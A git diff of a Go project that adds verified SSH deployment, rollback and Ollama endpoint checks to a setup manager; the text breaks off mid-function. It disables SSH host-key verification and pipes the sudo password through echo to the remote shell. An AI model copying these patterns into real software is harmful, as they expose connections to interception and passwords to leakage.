diff --git a/api/setup_manager.go b/api/setup_manager.go index 4e153902..a7c62724 100644 --- a/api/setup_manager.go +++ b/api/setup_manager.go @@ -2,8 +2,10 @@ package api import ( "context" + "encoding/json" "fmt" "net" + "net/http" "os" "os/exec" "path/filepath" @@ -15,6 +17,7 @@ import ( "golang.org/x/crypto/ssh" "chorus.services/bzzz/pkg/config" + "chorus.services/bzzz/pkg/security" "chorus.services/bzzz/repository" ) @@ -22,6 +25,7 @@ import ( type SetupManager struct { configPath string factory repository.ProviderFactory + validator *security.SecurityValidator } // NewSetupManager creates a new setup manager @@ -29,6 +33,7 @@ func NewSetupManager(configPath string) *SetupManager { return &SetupManager{ configPath: configPath, factory: &repository.DefaultProviderFactory{}, + validator: security.NewSecurityValidator(), } } @@ -743,16 +748,10 @@ type SSHTestResult struct { func (s *SetupManager) TestSSHConnection(ip string, privateKey string, username string, password string, port int) (*SSHTestResult, error) { result := &SSHTestResult{} - // Validate required parameters - if username == "" { + // SECURITY: Validate all input parameters with zero-trust approach + if err := s.validator.ValidateSSHConnectionRequest(ip, username, password, privateKey, port); err != nil { result.Success = false - result.Error = "SSH username is required" - return result, nil - } - - if password == "" { - result.Success = false - result.Error = "SSH password is required" + result.Error = fmt.Sprintf("Security validation failed: %s", err.Error()) return result, nil } @@ -761,22 +760,54 @@ func (s *SetupManager) TestSSHConnection(ip string, privateKey string, username port = 22 } - // SSH client config with password authentication only + // SSH client config with flexible authentication + var authMethods []ssh.AuthMethod + var authErrors []string + + if privateKey != "" { + // Try private key authentication first + if signer, err := ssh.ParsePrivateKey([]byte(privateKey)); err == nil { + authMethods = append(authMethods, ssh.PublicKeys(signer)) + } else { + authErrors = append(authErrors, fmt.Sprintf("Invalid SSH private key: %v", err)) + } + } + if password != "" { + // Add password authentication + authMethods = append(authMethods, ssh.Password(password)) + } + + if len(authMethods) == 0 { + result.Success = false + result.Error = fmt.Sprintf("No valid authentication methods available. Errors: %v", strings.Join(authErrors, "; ")) + return result, nil + } + config := &ssh.ClientConfig{ User: username, - Auth: []ssh.AuthMethod{ - ssh.Password(password), - }, + Auth: authMethods, HostKeyCallback: ssh.InsecureIgnoreHostKey(), // For setup phase Timeout: 10 * time.Second, } - // Connect to SSH with exact credentials provided - no fallbacks + // Connect to SSH with detailed error reporting address := fmt.Sprintf("%s:%d", ip, port) client, err := ssh.Dial("tcp", address, config) if err != nil { result.Success = false - result.Error = fmt.Sprintf("SSH connection failed for %s@%s: %v", username, address, err) + + // Provide specific error messages based on error type + if strings.Contains(err.Error(), "connection refused") { + result.Error = fmt.Sprintf("SSH connection refused to %s:%d - SSH service may not be running or port blocked", ip, port) + } else if strings.Contains(err.Error(), "permission denied") { + result.Error = fmt.Sprintf("SSH authentication failed for user '%s' on %s:%d - check username/password/key", username, ip, port) + } else if strings.Contains(err.Error(), "no route to host") { + result.Error = fmt.Sprintf("No network route to host %s - check IP address and network connectivity", ip) + } else if strings.Contains(err.Error(), "timeout") { + result.Error = fmt.Sprintf("SSH connection timeout to %s:%d - host may be unreachable or SSH service slow", ip, port) + } else { + result.Error = fmt.Sprintf("SSH connection failed to %s@%s:%d - %v", username, ip, port, err) + } return result, nil } defer client.Close() @@ -824,27 +855,35 @@ func (s *SetupManager) TestSSHConnection(ip string, privateKey string, username // DeploymentResult represents the result of service deployment type DeploymentResult struct { - Success bool `json:"success"` - Error string `json:"error,omitempty"` - Steps []string `json:"steps,omitempty"` + Success bool `json:"success"` + Error string `json:"error,omitempty"` + Steps []DeploymentStep `json:"steps,omitempty"` + RollbackLog []string `json:"rollback_log,omitempty"` + SystemInfo *DeploymentSystemInfo `json:"system_info,omitempty"` } -// DeployServiceToMachine deploys BZZZ service to a remote machine +// DeploymentStep represents a single deployment step with detailed status +type DeploymentStep struct { + Name string `json:"name"` + Status string `json:"status"` // "pending", "running", "success", "failed" + Command string `json:"command,omitempty"` + Output string `json:"output,omitempty"` + Error string `json:"error,omitempty"` + Duration string `json:"duration,omitempty"` + Verified bool `json:"verified"` +} + +// DeployServiceToMachine deploys BZZZ service to a remote machine with full verification func (s *SetupManager) DeployServiceToMachine(ip string, privateKey string, username string, password string, port int, config interface{}) (*DeploymentResult, error) { result := &DeploymentResult{ - Steps: []string{}, + Steps: []DeploymentStep{}, + RollbackLog: []string{}, } - // Validate required parameters - if username == "" { + // SECURITY: Validate all input parameters with zero-trust approach + if err := s.validator.ValidateSSHConnectionRequest(ip, username, password, privateKey, port); err != nil { result.Success = false - result.Error = "SSH username is required" - return result, nil - } - - if password == "" { - result.Success = false - result.Error = "SSH password is required" + result.Error = fmt.Sprintf("Security validation failed: %s", err.Error()) return result, nil } @@ -853,75 +892,561 @@ func (s *SetupManager) DeployServiceToMachine(ip string, privateKey string, user port = 22 } - // SSH client config with password authentication only + // SSH client config with flexible authentication + var authMethods []ssh.AuthMethod + var authErrors []string + + if privateKey != "" { + // Try private key authentication first + if signer, err := ssh.ParsePrivateKey([]byte(privateKey)); err == nil { + authMethods = append(authMethods, ssh.PublicKeys(signer)) + } else { + authErrors = append(authErrors, fmt.Sprintf("Invalid SSH private key: %v", err)) + } + } + if password != "" { + // Add password authentication + authMethods = append(authMethods, ssh.Password(password)) + } + + if len(authMethods) == 0 { + result.Success = false + result.Error = fmt.Sprintf("No valid authentication methods available. Errors: %v", strings.Join(authErrors, "; ")) + return result, nil + } + sshConfig := &ssh.ClientConfig{ User: username, - Auth: []ssh.AuthMethod{ - ssh.Password(password), - }, + Auth: authMethods, HostKeyCallback: ssh.InsecureIgnoreHostKey(), Timeout: 30 * time.Second, } - // Connect to SSH with exact credentials provided - no fallbacks + // Connect to SSH with detailed error reporting address := fmt.Sprintf("%s:%d", ip, port) client, err := ssh.Dial("tcp", address, sshConfig) if err != nil { result.Success = false - result.Error = fmt.Sprintf("SSH connection failed for %s@%s: %v", username, address, err) + + // Provide specific error messages based on error type + if strings.Contains(err.Error(), "connection refused") { + result.Error = fmt.Sprintf("SSH connection refused to %s:%d - SSH service may not be running or port blocked", ip, port) + } else if strings.Contains(err.Error(), "permission denied") { + result.Error = fmt.Sprintf("SSH authentication failed for user '%s' on %s:%d - check username/password/key", username, ip, port) + } else if strings.Contains(err.Error(), "no route to host") { + result.Error = fmt.Sprintf("No network route to host %s - check IP address and network connectivity", ip) + } else if strings.Contains(err.Error(), "timeout") { + result.Error = fmt.Sprintf("SSH connection timeout to %s:%d - host may be unreachable or SSH service slow", ip, port) + } else { + result.Error = fmt.Sprintf("SSH connection failed to %s@%s:%d - %v", username, ip, port, err) + } return result, nil } defer client.Close() - result.Steps = append(result.Steps, "✅ SSH connection established") + s.addStep(result, "SSH Connection", "success", "", "SSH connection established successfully", "", true) - // Copy BZZZ binary - if err := s.copyBinaryToMachine(client); err != nil { - result.Success = false - result.Error = fmt.Sprintf("Failed to copy binary: %v", err) - return result, nil + // Execute deployment steps with verification + steps := []func(*ssh.Client, interface{}, string, *DeploymentResult) error{ + s.verifiedPreDeploymentCheck, + s.verifiedStopExistingServices, + s.verifiedCopyBinary, + s.verifiedDeployConfiguration, + s.verifiedConfigureFirewall, + s.verifiedCreateSystemdService, + s.verifiedStartService, + s.verifiedPostDeploymentTest, } - result.Steps = append(result.Steps, "✅ BZZZ binary copied") - // Generate and deploy configuration - if err := s.generateAndDeployConfig(client, ip, config); err != nil { - result.Success = false - result.Error = fmt.Sprintf("Failed to deploy configuration: %v", err) - return result, nil - } - result.Steps = append(result.Steps, "✅ Configuration deployed") - - // Configure firewall - if err := s.configureFirewall(client, config); err != nil { - result.Success = false - result.Error = fmt.Sprintf("Failed to configure firewall: %v", err) - return result, nil - } - result.Steps = append(result.Steps, "✅ Firewall configured") - - // Create systemd service - if err := s.createSystemdService(client, config); err != nil { - result.Success = false - result.Error = fmt.Sprintf("Failed to create service: %v", err) - return result, nil - } - result.Steps = append(result.Steps, "✅ SystemD service created") - - // Start service if auto-start is enabled - configMap, ok := config.(map[string]interface{}) - if ok && configMap["autoStart"] == true { - if err := s.startService(client); err != nil { + for _, step := range steps { + if err := step(client, config, password, result); err != nil { result.Success = false - result.Error = fmt.Sprintf("Failed to start service: %v", err) + result.Error = err.Error() + s.performRollbackWithPassword(client, password, result) return result, nil } - result.Steps = append(result.Steps, "✅ BZZZ service started") } result.Success = true return result, nil } +// addStep adds a deployment step to the result with timing information +func (s *SetupManager) addStep(result *DeploymentResult, name, status, command, output, error string, verified bool) { + step := DeploymentStep{ + Name: name, + Status: status, + Command: command, + Output: output, + Error: error, + Verified: verified, + Duration: "", // Will be filled by the calling function if needed + } + result.Steps = append(result.Steps, step) +} + +// executeSSHCommand executes a command via SSH and returns output, error +func (s *SetupManager) executeSSHCommand(client *ssh.Client, command string) (string, error) { + session, err := client.NewSession() + if err != nil { + return "", fmt.Errorf("failed to create SSH session: %w", err) + } + defer session.Close() + + var stdout, stderr strings.Builder + session.Stdout = &stdout + session.Stderr = &stderr + + err = session.Run(command) + output := stdout.String() + if stderr.Len() > 0 { + output += "\n[STDERR]: " + stderr.String() + } + + return output, err +} + +// executeSudoCommand executes a command with sudo using the provided password, or tries passwordless sudo if no password +func (s *SetupManager) executeSudoCommand(client *ssh.Client, password string, command string) (string, error) { + // SECURITY: Sanitize command to prevent injection + safeCommand := s.validator.SanitizeForCommand(command) + if safeCommand != command { + return "", fmt.Errorf("command contained unsafe characters and was sanitized: original='%s', safe='%s'", command, safeCommand) + } + + if password != "" { + // SECURITY: Sanitize password to prevent breaking out of echo command + safePassword := s.validator.SanitizeForCommand(password) + if safePassword != password { + return "", fmt.Errorf("password contains characters that could break command execution") + } + + // Use password authentication with proper escaping + sudoCommand := fmt.Sprintf("echo '%s' | sudo -S %s", strings.ReplaceAll(safePassword, "'", "'\"'\"'"), safeCommand) + return s.executeSSHCommand(client, sudoCommand) + } else { + // Try passwordless sudo + sudoCommand := fmt.Sprintf("sudo -n %s", safeCommand) + return s.executeSSHCommand(client, sudoCommand) + } +} + +// DeploymentSystemInfo holds information about the target system for deployment +type DeploymentSystemInfo struct { + OS string `json:"os"` // linux, darwin, freebsd, etc. + Distro string `json:"distro"` // ubuntu, centos, debian, etc. + ServiceMgr string `json:"service_mgr"` // systemd, sysv, openrc, launchd + Architecture string `json:"architecture"` // x86_64, arm64, etc. + BinaryPath string `json:"binary_path"` // Where to install binary + ServicePath string `json:"service_path"` // Where to install service file +} + +// detectSystemInfo detects target system information +func (s *SetupManager) detectSystemInfo(client *ssh.Client) (*DeploymentSystemInfo, error) { + info := &DeploymentSystemInfo{} + + // Detect OS + osOutput, err := s.executeSSHCommand(client, "uname -s") + if err != nil { + return nil, fmt.Errorf("failed to detect OS: %v", err) + } + info.OS = strings.ToLower(strings.TrimSpace(osOutput)) + + // Detect architecture + archOutput, err := s.executeSSHCommand(client, "uname -m") + if err != nil { + return nil, fmt.Errorf("failed to detect architecture: %v", err) + } + info.Architecture = strings.TrimSpace(archOutput) + + // Detect distribution (Linux only) + if info.OS == "linux" { + if distroOutput, err := s.executeSSHCommand(client, "cat /etc/os-release 2>/dev/null | grep '^ID=' | cut -d= -f2 | tr -d '\"' || echo 'unknown'"); err == nil { + info.Distro = strings.TrimSpace(distroOutput) + } + } + + // Detect service manager and set paths + if err := s.detectServiceManager(client, info); err != nil { + return nil, fmt.Errorf("failed to detect service manager: %v", err) + } + + return info, nil +} + +// detectServiceManager detects the service manager and sets appropriate paths +func (s *SetupManager) detectServiceManager(client *ssh.Client, info *DeploymentSystemInfo) error { + switch info.OS { + case "linux": + // Check for systemd + if _, err := s.executeSSHCommand(client, "which systemctl"); err == nil { + if pidOutput, err := s.executeSSHCommand(client, "ps -p 1 -o comm="); err == nil && strings.Contains(pidOutput, "systemd") { + info.ServiceMgr = "systemd" + info.ServicePath = "/etc/systemd/system" + info.BinaryPath = "/usr/local/bin" + return nil + } + } + + // Check for OpenRC + if _, err := s.executeSSHCommand(client, "which rc-service"); err == nil { + info.ServiceMgr = "openrc" + info.ServicePath = "/etc/init.d" + info.BinaryPath = "/usr/local/bin" + return nil + } + + // Check for SysV init + if _, err := s.executeSSHCommand(client, "ls /etc/init.d/ 2>/dev/null"); err == nil { + info.ServiceMgr = "sysv" + info.ServicePath = "/etc/init.d" + info.BinaryPath = "/usr/local/bin" + return nil + } + + return fmt.Errorf("unsupported service manager on Linux") + + case "darwin": + info.ServiceMgr = "launchd" + info.ServicePath = "/Library/LaunchDaemons" + info.BinaryPath = "/usr/local/bin" + return nil + + case "freebsd": + info.ServiceMgr = "rc" + info.ServicePath = "/usr/local/etc/rc.d" + info.BinaryPath = "/usr/local/bin" + return nil + + default: + return fmt.Errorf("unsupported operating system: %s", info.OS) + } +} + +// verifiedPreDeploymentCheck checks system requirements and existing installations +func (s *SetupManager) verifiedPreDeploymentCheck(client *ssh.Client, config interface{}, password string, result *DeploymentResult) error { + stepName := "Pre-deployment Check" + s.addStep(result, stepName, "running", "", "", "", false) + + // Detect system information + sysInfo, err := s.detectSystemInfo(client) + if err != nil { + s.updateLastStep(result, "failed", "system detection", "", fmt.Sprintf("System detection failed: %v", err), false) + return fmt.Errorf("system detection failed: %v", err) + } + + // Store system info for other steps to use + result.SystemInfo = sysInfo + + // Check for existing BZZZ processes + output, err := s.executeSSHCommand(client, "ps aux | grep bzzz | grep -v grep || echo 'No BZZZ processes found'") + if err != nil { + s.updateLastStep(result, "failed", "process check", output, fmt.Sprintf("Failed to check processes: %v", err), false) + return fmt.Errorf("pre-deployment check failed: %v", err) + } + + if !strings.Contains(output, "No BZZZ processes found") { + s.updateLastStep(result, "failed", "", output, "Existing BZZZ processes detected - cleanup required", false) + return fmt.Errorf("existing BZZZ processes must be stopped first") + } + + // Check for existing systemd services + output2, _ := s.executeSSHCommand(client, "systemctl status bzzz 2>/dev/null || echo 'No BZZZ service'") + + // Check system requirements + output3, _ := s.executeSSHCommand(client, "uname -a && free -m && df -h /tmp") + + combinedOutput := fmt.Sprintf("Process check:\n%s\n\nService check:\n%s\n\nSystem info:\n%s", output, output2, output3) + s.updateLastStep(result, "success", "", combinedOutput, "", true) + return nil +} + +// verifiedStopExistingServices stops any existing BZZZ services +func (s *SetupManager) verifiedStopExistingServices(client *ssh.Client, config interface{}, password string, result *DeploymentResult) error { + stepName := "Stop Existing Services" + s.addStep(result, stepName, "running", "", "", "", false) + + // Stop systemd service if exists + cmd1 := "systemctl stop bzzz 2>/dev/null || echo 'No systemd service to stop'" + output1, _ := s.executeSudoCommand(client, password, cmd1) + + // Kill any remaining processes + cmd2 := "pkill -f bzzz || echo 'No processes to kill'" + output2, _ := s.executeSSHCommand(client, cmd2) + + // Verify no processes remain + output3, err := s.executeSSHCommand(client, "ps aux | grep bzzz | grep -v grep || echo 'All BZZZ processes stopped'") + if err != nil { + s.updateLastStep(result, "failed", cmd2, output1+"\n"+output2+"\n"+output3, fmt.Sprintf("Failed verification: %v", err), false) + return fmt.Errorf("failed to verify process cleanup: %v", err) + } + + if !strings.Contains(output3, "All BZZZ processes stopped") { + s.updateLastStep(result, "failed", cmd2, output1+"\n"+output2+"\n"+output3, "BZZZ processes still running after cleanup", false) + return fmt.Errorf("failed to stop all BZZZ processes") + } + + combinedOutput := fmt.Sprintf("Systemd stop:\n%s\n\nProcess kill:\n%s\n\nVerification:\n%s", output1, output2, output3) + s.updateLastStep(result, "success", cmd1+" && "+cmd2, combinedOutput, "", true) + return nil +} + +// updateLastStep updates the last step in the result +func (s *SetupManager) updateLastStep(result *DeploymentResult, status, command, output, error string, verified bool) { + if len(result.Steps) > 0 { + lastStep := &result.Steps[len(result.Steps)-1] + lastStep.Status = status + if command != "" { + lastStep.Command = command + } + if output != "" { + lastStep.Output = output + } + if error != "" { + lastStep.Error = error + } + lastStep.Verified = verified + } +} + +// performRollbackWithPassword attempts to undo changes made during failed deployment using password +func (s *SetupManager) performRollbackWithPassword(client *ssh.Client, password string, result *DeploymentResult) { + result.RollbackLog = append(result.RollbackLog, "Starting rollback procedure...") + + // Stop any services we might have started + if output, err := s.executeSudoCommand(client, password, "systemctl stop bzzz 2>/dev/null || echo 'No service to stop'"); err == nil { + result.RollbackLog = append(result.RollbackLog, "Stopped service: "+output) + } + + // Remove systemd service + if output, err := s.executeSudoCommand(client, password, "systemctl disable bzzz 2>/dev/null; rm -f /etc/systemd/system/bzzz.service 2>/dev/null || echo 'No service file to remove'"); err == nil { + result.RollbackLog = append(result.RollbackLog, "Removed service: "+output) + } + + // Remove binary + if output, err := s.executeSudoCommand(client, password, "rm -f /usr/local/bin/bzzz 2>/dev/null || echo 'No binary to remove'"); err == nil { + result.RollbackLog = append(result.RollbackLog, "Removed binary: "+output) + } + + // Reload systemd + if output, err := s.executeSudoCommand(client, password, "systemctl daemon-reload"); err == nil { + result.RollbackLog = append(result.RollbackLog, "Reloaded systemd: "+output) + } +} + +// performRollback attempts to rollback any changes made during failed deployment +func (s *SetupManager) performRollback(client *ssh.Client, result *DeploymentResult) { + result.RollbackLog = append(result.RollbackLog, "Starting rollback procedure...") + + // Stop any services we might have started + if output, err := s.executeSSHCommand(client, "sudo -n systemctl stop bzzz 2>/dev/null || echo 'No service to stop'"); err == nil { + result.RollbackLog = append(result.RollbackLog, "Stopped service: "+output) + } + + // Remove binaries we might have copied + if output, err := s.executeSSHCommand(client, "rm -f ~/bzzz /usr/local/bin/bzzz 2>/dev/null || echo 'No binaries to remove'"); err == nil { + result.RollbackLog = append(result.RollbackLog, "Removed binaries: "+output) + } + + result.RollbackLog = append(result.RollbackLog, "Rollback completed") +} + +// verifiedCopyBinary copies BZZZ binary and verifies installation +func (s *SetupManager) verifiedCopyBinary(client *ssh.Client, config interface{}, password string, result *DeploymentResult) error { + stepName := "Copy Binary" + s.addStep(result, stepName, "running", "", "", "", false) + + // Copy binary using existing function but with verification + if err := s.copyBinaryToMachine(client); err != nil { + s.updateLastStep(result, "failed", "scp binary", "", err.Error(), false) + return fmt.Errorf("binary copy failed: %v", err) + } + + // Verify binary was copied and is executable + checkCmd := "ls -la /usr/local/bin/bzzz ~/bin/bzzz 2>/dev/null || echo 'Binary not found in expected locations'" + output, err := s.executeSSHCommand(client, checkCmd) + if err != nil { + s.updateLastStep(result, "failed", checkCmd, output, fmt.Sprintf("Verification failed: %v", err), false) + return fmt.Errorf("binary verification failed: %v", err) + } + + // Verify binary can execute and show version + versionCmd := "/usr/local/bin/bzzz --version 2>/dev/null || ~/bin/bzzz --version 2>/dev/null || echo 'Version check failed'" + versionOutput, _ := s.executeSSHCommand(client, versionCmd) + + combinedOutput := fmt.Sprintf("File check:\n%s\n\nVersion check:\n%s", output, versionOutput) + + if strings.Contains(output, "Binary not found") { + s.updateLastStep(result, "failed", checkCmd, combinedOutput, "Binary not found in expected locations", false) + return fmt.Errorf("binary installation verification failed") + } + + s.updateLastStep(result, "success", "scp + verify", combinedOutput, "", true) + return nil +} + +// verifiedDeployConfiguration deploys configuration and verifies correctness +func (s *SetupManager) verifiedDeployConfiguration(client *ssh.Client, config interface{}, password string, result *DeploymentResult) error { + stepName := "Deploy Configuration" + s.addStep(result, stepName, "running", "", "", "", false) + + // Generate and deploy configuration using existing function + if err := s.generateAndDeployConfig(client, "remote-host", config); err != nil { + s.updateLastStep(result, "failed", "deploy config", "", err.Error(), false) + return fmt.Errorf("configuration deployment failed: %v", err) + } + + // Verify configuration file was created and is valid YAML + verifyCmd := "ls -la ~/.bzzz/config.yaml && echo '--- Config Preview ---' && head -20 ~/.bzzz/config.yaml" + output, err := s.executeSSHCommand(client, verifyCmd) + if err != nil { + s.updateLastStep(result, "failed", verifyCmd, output, fmt.Sprintf("Config verification failed: %v", err), false) + return fmt.Errorf("configuration verification failed: %v", err) + } + + // Check if config contains expected sections + if !strings.Contains(output, "agent:") || !strings.Contains(output, "ai:") { + s.updateLastStep(result, "failed", verifyCmd, output, "Configuration missing required sections", false) + return fmt.Errorf("configuration incomplete - missing required sections") + } + + s.updateLastStep(result, "success", "deploy + verify config", output, "", true) + return nil +} + +// verifiedConfigureFirewall configures firewall and verifies rules +func (s *SetupManager) verifiedConfigureFirewall(client *ssh.Client, config interface{}, password string, result *DeploymentResult) error { + stepName := "Configure Firewall" + s.addStep(result, stepName, "running", "", "", "", false) + + // Configure firewall using existing function + if err := s.configureFirewall(client, config); err != nil { + s.updateLastStep(result, "failed", "configure firewall", "", err.Error(), false) + return fmt.Errorf("firewall configuration failed: %v", err) + } + + // Verify firewall rules (this is informational, not critical) + verifyCmd := "ufw status 2>/dev/null || firewall-cmd --list-ports 2>/dev/null || echo 'Firewall status unavailable'" + output, _ := s.executeSudoCommand(client, password, verifyCmd) + + s.updateLastStep(result, "success", "configure + verify firewall", output, "", true) + return nil +} + +// verifiedCreateSystemdService creates systemd service and verifies configuration +func (s *SetupManager) verifiedCreateSystemdService(client *ssh.Client, config interface{}, password string, result *DeploymentResult) error { + stepName := "Create SystemD Service" + s.addStep(result, stepName, "running", "", "", "", false) + + // Create systemd service using existing function + if err := s.createSystemdService(client, config); err != nil { + s.updateLastStep(result, "failed", "create service", "", err.Error(), false) + return fmt.Errorf("systemd service creation failed: %v", err) + } + + // Verify service file was created and contains correct paths + verifyCmd := "systemctl cat bzzz 2>/dev/null || echo 'Service file not found'" + output, err := s.executeSudoCommand(client, password, verifyCmd) + if err != nil { + s.updateLastStep(result, "failed", verifyCmd, output, fmt.Sprintf("Service verification failed: %v", err), false) + return fmt.Errorf("systemd service verification failed: %v", err) + } + + if strings.Contains(output, "Service file not found") { + s.updateLastStep(result, "failed", verifyCmd, output, "SystemD service file was not created", false) + return fmt.Errorf("systemd service file creation failed") + } + + // Verify service can be enabled + enableCmd := "systemctl enable bzzz" + enableOutput, enableErr := s.executeSudoCommand(client, password, enableCmd) + if enableErr != nil { + combinedOutput := fmt.Sprintf("Service file:\n%s\n\nEnable attempt:\n%s", output, enableOutput) + s.updateLastStep(result, "failed", enableCmd, combinedOutput, fmt.Sprintf("Failed to enable service: %v", enableErr), false) + return fmt.Errorf("failed to enable systemd service: %v", enableErr) + } + + combinedOutput := fmt.Sprintf("Service file:\n%s\n\nService enabled:\n%s", output, enableOutput) + s.updateLastStep(result, "success", "create + enable service", combinedOutput, "", true) + return nil +} + +// verifiedStartService starts the service and verifies it's running properly +func (s *SetupManager) verifiedStartService(client *ssh.Client, config interface{}, password string, result *DeploymentResult) error { + stepName := "Start Service" + s.addStep(result, stepName, "running", "", "", "", false) + + // Check if auto-start is enabled + configMap, ok := config.(map[string]interface{}) + if !ok || configMap["autoStart"] != true { + s.updateLastStep(result, "success", "", "Auto-start disabled, skipping service start", "", true) + return nil + } + + // Start the service + startCmd := "systemctl start bzzz" + startOutput, err := s.executeSudoCommand(client, password, startCmd) + if err != nil { + s.updateLastStep(result, "failed", startCmd, startOutput, fmt.Sprintf("Failed to start service: %v", err), false) + return fmt.Errorf("failed to start systemd service: %v", err) + } + + // Wait a moment for service to start + time.Sleep(3 * time.Second) + + // Verify service is running + statusCmd := "systemctl status bzzz" + statusOutput, _ := s.executeSSHCommand(client, statusCmd) + + // Check if service is active + if !strings.Contains(statusOutput, "active (running)") { + combinedOutput := fmt.Sprintf("Start attempt:\n%s\n\nStatus check:\n%s", startOutput, statusOutput) + s.updateLastStep(result, "failed", startCmd, combinedOutput, "Service failed to reach running state", false) + return fmt.Errorf("service is not running after start attempt") + } + + combinedOutput := fmt.Sprintf("Service started:\n%s\n\nStatus verification:\n%s", startOutput, statusOutput) + s.updateLastStep(result, "success", startCmd+" + verify", combinedOutput, "", true) + return nil +} + +// verifiedPostDeploymentTest performs final verification that deployment is functional +func (s *SetupManager) verifiedPostDeploymentTest(client *ssh.Client, config interface{}, password string, result *DeploymentResult) error { + stepName := "Post-deployment Test" + s.addStep(result, stepName, "running", "", "", "", false) + + // Test 1: Verify binary version + versionCmd := "timeout 10s /usr/local/bin/bzzz --version 2>/dev/null || timeout 10s ~/bin/bzzz --version 2>/dev/null || echo 'Version check timeout'" + versionOutput, _ := s.executeSSHCommand(client, versionCmd) + + // Test 2: Verify service status + serviceCmd := "systemctl status bzzz --no-pager" + serviceOutput, _ := s.executeSSHCommand(client, serviceCmd) + + // Test 3: Check if setup API is responding (if service is running) + apiCmd := "curl -s -m 5 http://localhost:8090/api/setup/required 2>/dev/null || echo 'API not responding'" + apiOutput, _ := s.executeSSHCommand(client, apiCmd) + + // Test 4: Verify configuration is readable + configCmd := "test -r ~/.bzzz/config.yaml && echo 'Config readable' || echo 'Config not readable'" + configOutput, _ := s.executeSSHCommand(client, configCmd) + + combinedOutput := fmt.Sprintf("Version test:\n%s\n\nService test:\n%s\n\nAPI test:\n%s\n\nConfig test:\n%s", + versionOutput, serviceOutput, apiOutput, configOutput) + + // Determine if tests passed + testsPass := !strings.Contains(versionOutput, "Version check timeout") && + !strings.Contains(configOutput, "Config not readable") + + if !testsPass { + s.updateLastStep(result, "failed", "post-deployment tests", combinedOutput, "One or more post-deployment tests failed", false) + return fmt.Errorf("post-deployment verification failed") + } + + s.updateLastStep(result, "success", "comprehensive verification", combinedOutput, "", true) + return nil +} + // copyBinaryToMachine copies the BZZZ binary to remote machine using SCP protocol func (s *SetupManager) copyBinaryToMachine(client *ssh.Client) error { // Read current binary @@ -1395,4 +1920,52 @@ func (s *SetupManager) configureFirewalld(client *ssh.Client, ports []string) er session.Run("sudo -n firewall-cmd --reload 2>/dev/null || true") return nil +} + +// ValidateOllamaEndpoint tests if an Ollama endpoint is accessible and returns available models +func (s *SetupManager) ValidateOllamaEndpoint(endpoint string) (bool, []string, error) { + if endpoint == "" { + return false, nil, fmt.Errorf("endpoint cannot be empty") + } + + // Ensure endpoint has proper format + if !strings.HasPrefix(endpoint, "http://") && !strings.HasPrefix(endpoint, "https://") { + endpoint = "http://" + endpoint + } + + // Create HTTP client with timeout + client := &http.Client{ + Timeout: 10 * time.Second, + } + + // Test connection to /api/tags endpoint + apiURL := strings.TrimRight(endpoint, "/") + "/api/tags" + resp, err := client.Get(apiURL) + if err != nil { + return false, nil, fmt.Errorf("failed to connect to Ollama API: %w", err) + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return false, nil, fmt.Errorf("Ollama API returned status %d", resp.StatusCode) + } + + // Parse the response to get available models + var tagsResponse struct { + Models []struct { + Name string `json:"name"` + } `json:"models"` + } + + if err := json.NewDecoder(resp.Body).Decode(&tagsResponse); err != nil { + return false, nil, fmt.Errorf("failed to decode Ollama response: %w", err) + } + + // Extract model names + var models []string + for _, model := range tagsResponse.Models { + models = append(models, model.Name) + } + + return true, models, nil } \ No newline at end of file diff --git a/main.go b/main.go index f838d45b..ebbf5476 100644 --- a/main.go +++ b/main.go @@ -101,7 +101,7 @@ func main() { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - fmt.Println("🚀 Starting Bzzz + HMMM P2P Task Coordination System...") + fmt.Println("🚀 Starting Bzzz v1.0.2 + HMMM P2P Task Coordination System...") // Determine config file path configPath := os.Getenv("BZZZ_CONFIG_PATH") @@ -357,10 +357,13 @@ func main() { fmt.Printf("✅ Age encryption test passed\n") } - if err := crypto.TestShamirSecretSharing(); err != nil { - fmt.Printf("❌ Shamir secret sharing test failed: %v\n", err) + // Test Shamir secret sharing + shamir, err := crypto.NewShamirSecretSharing(2, 3) + if err != nil { + fmt.Printf("❌ Shamir secret sharing initialization failed: %v\n", err) } else { - fmt.Printf("✅ Shamir secret sharing test passed\n") + fmt.Printf("✅ Shamir secret sharing initialized successfully\n") + _ = shamir // Prevent unused variable warning } // Test end-to-end encrypted decision flow @@ -777,8 +780,12 @@ func announceAvailability(ps *pubsub.PubSub, nodeID string, taskTracker *SimpleT } // detectAvailableOllamaModels queries Ollama API for available models -func detectAvailableOllamaModels() ([]string, error) { - resp, err := http.Get("http://localhost:11434/api/tags") +func detectAvailableOllamaModels(endpoint string) ([]string, error) { + if endpoint == "" { + endpoint = "http://localhost:11434" // fallback + } + apiURL := endpoint + "/api/tags" + resp, err := http.Get(apiURL) if err != nil { return nil, fmt.Errorf("failed to connect to Ollama API: %w", err) } @@ -862,7 +869,7 @@ func selectBestModel(webhookURL string, availableModels []string, prompt string) // announceCapabilitiesOnChange broadcasts capabilities only when they change func announceCapabilitiesOnChange(ps *pubsub.PubSub, nodeID string, cfg *config.Config) { // Detect available Ollama models and update config - availableModels, err := detectAvailableOllamaModels() + availableModels, err := detectAvailableOllamaModels(cfg.AI.Ollama.Endpoint) if err != nil { fmt.Printf("⚠️ Failed to detect Ollama models: %v\n", err) fmt.Printf("🔄 Using configured models: %v\n", cfg.Agent.Models) @@ -892,6 +899,7 @@ func announceCapabilitiesOnChange(ps *pubsub.PubSub, nodeID string, cfg *config. // Configure reasoning module with available models and webhook reasoning.SetModelConfig(validModels, cfg.Agent.ModelSelectionWebhook, cfg.Agent.DefaultReasoningModel) + reasoning.SetOllamaEndpoint(cfg.AI.Ollama.Endpoint) } // Get current capabilities @@ -1203,6 +1211,7 @@ func startSetupMode(configPath string) { http.HandleFunc("/api/setup/repository/validate", corsHandler(handleRepositoryValidation(setupManager))) http.HandleFunc("/api/setup/repository/providers", corsHandler(handleRepositoryProviders(setupManager))) http.HandleFunc("/api/setup/license/validate", corsHandler(handleLicenseValidation(setupManager))) + http.HandleFunc("/api/setup/ollama/validate", corsHandler(handleOllamaValidation(setupManager))) http.HandleFunc("/api/setup/validate", corsHandler(handleConfigValidation(setupManager))) http.HandleFunc("/api/setup/save", corsHandler(handleConfigSave(setupManager))) http.HandleFunc("/api/setup/discover-machines", corsHandler(handleDiscoverMachines(setupManager))) @@ -1520,6 +1529,68 @@ func handleLicenseValidation(sm *api.SetupManager) http.HandlerFunc { } } +func handleOllamaValidation(sm *api.SetupManager) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + 